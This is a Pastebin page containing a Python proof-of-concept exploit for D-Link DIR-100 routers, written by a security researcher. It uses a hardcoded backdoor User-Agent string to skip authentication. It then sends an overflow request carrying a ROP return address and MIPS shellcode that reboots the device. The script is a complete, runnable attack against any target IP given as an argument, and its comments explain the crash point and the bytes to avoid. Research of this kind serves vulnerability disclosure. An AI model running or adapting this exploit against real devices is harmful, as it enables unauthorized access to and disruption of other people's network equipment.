Guest User

D-Link Backdoor Stack Overflow PoC DIR-100 v1.13

a guest
Oct 14th, 2013
21,030
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. ###################################################################################################################
  3. # PoC exploit code for DIR-100 revA, v1.13
  4. # ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip
  5. # Tested in an emulator, but should work on the real thing.
  6. #
  7. # A sprintf stack overflow exists in the RuntimeDiagnosticPing function inside /bin/webs. This is also
  8. # theoretically suceptable to command injection, but there are few useful commands that can be executed (
  9. # not even 'reboot'). Further, data is not URL deocded prior to the sprintf, spaces cannot be used in the GET
  10. # reuqest URL, and the $IFS environment variable does not seem to be set in the limited /bin/sh shell; thus,
  11. # it would be difficult, if possible at all, to inject commands that take arguments.
  12. #
  13. # This is a simple ROP into the stack. After the sprintf, popen("ping -c 1 %s", "r") is called three times,
  14. # which should be more than enough to ensure that the data cache has been flushed back to main memory (thus
  15. # no need to ROP to a blocking call, such as sleep). Further, at return the $s5 register conveniently has a
  16. # pointer to the user-supplied data on the stack, so we just return to offset 0x3243C in libc which puts
  17. # the contents of $s5 into $t9 and then jumps to the address in $t9:
  18. #
  19. #   .text:0003243C                 move    $t9, $s5
  20. #   .text:00032440                 jalr    $t9
  21. #   .text:00032444                 nop
  22. #
  23. # Some known bad bytes that will cause the exploit to fail if they are contained in your request (there is no URL
  24. # decoding!): '/', '?', '&', '=', '\r', '\n'
  25. #
  26. # Craig Heffner
  27. # Tactical Network Solutions
  28. ###################################################################################################################
  29.  
  30. import sys
  31. import urllib2
  32.  
  33. try:
  34.     url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
  35. except Exception, e:
  36.     print str(e)
  37.     print 'Usage: %s <target ip>' % sys.argv[0]
  38.     sys.exit(1)
  39.  
  40. # This is the actual payload; here it is a simple reboot shellcode.
  41. # This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
  42. payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
  43. payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
  44. payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
  45. payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
  46. payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
  47. payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
  48. payload += "\x24\x02\x0f\xf8" # li      v0,4088
  49. payload += "\x01\x01\x01\x0c" # syscall 0x40404
  50.  
  51. # The payload is split up; some of it before the return address on the stack, some after.
  52. # This little snippet skips over the return address during execution.
  53. # It assumes that your shellcode will not be using the $fp or $t9 registers.
  54. move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
  55. jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
  56. jump_code += "\x03\x21\xf8\x08" # jr $t9
  57. jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102
  58.  
  59. # Stitch together the payload chunk(s) and jump_code snippet
  60. shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
  61. if len(shellcode_p1) < 86:
  62.     shellcode_p1 += "D" * (86 - len(shellcode_p1))
  63.     shellcode_p2 = ""
  64. else:
  65.     shellcode_p2 = "DD" + payload[68:]
  66.  
  67. # Build the overflow buffer, with the return address and shellcode
  68. # libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
  69. # libc_base = 0x2aaee000
  70. # ret_offset = 0x3243C
  71. buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
  72.  
  73. # Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
  74. req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
  75. urllib2.urlopen(req)
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×